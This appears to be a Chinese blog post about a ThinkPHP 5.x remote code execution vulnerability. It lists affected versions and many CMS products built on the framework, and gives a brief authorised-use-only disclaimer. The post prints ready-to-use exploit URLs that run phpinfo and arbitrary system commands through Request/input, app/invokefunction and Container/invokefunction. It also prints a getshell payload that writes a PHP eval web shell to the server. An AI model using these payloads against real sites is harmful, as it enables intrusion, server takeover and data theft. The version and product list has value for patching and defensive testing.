thinkphp5调用shell脚本_ThinkPHP 5.x远程命令执行测试工具(可getshell)
该工具只能授权验证网站漏洞和站长验证漏洞使用。
禁止用于未授权测试,非法入侵,否则一切后果自负,和作者无关。
影响范围5.x < 5.1.31
5.x <= 5.0.23
以下基于ThinkPHP5 二次开发的内容管理系统,很可能受到该漏洞影响,建议厂商及时更新。AdminLTE后台管理系统
layui后台管理系统
thinkcmf
H-ui.admin后台管理系统
tpshop
FsatAdmin
eyoucms
LarryCMS后台管理系统
tpadmin后台管理系统
snake后台管理系统
ThinkSNS
DolphinPHP后台管理系统
WeMall商城系统
CLTPHP
齐博CMS
DSMALL
YFCMF
HisiPHP后台管理系统
Tplay后台管理系统
lyadmin后台管理系统
haoid后台管理系统
漏洞验证
命令执行
getshell
下载地址:
存在风险,暂不提供下载。
附上测试代码#代码执行
?s=index/\think\Request/input&filter=phpinfo&data=1
#命令执行
?s=index/\think\Request/input&filter=system&data=系统命令
#getshell
?s=index/\think\template\driver\file/write&cacheFile=paylog.php&content=%3C?php%20eval($_POST[20208]);?%3Ehacker
#getshell2
?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
#代码执行
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
#命令执行
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=系统命令
#代码执行
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
#命令执行
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=系统命令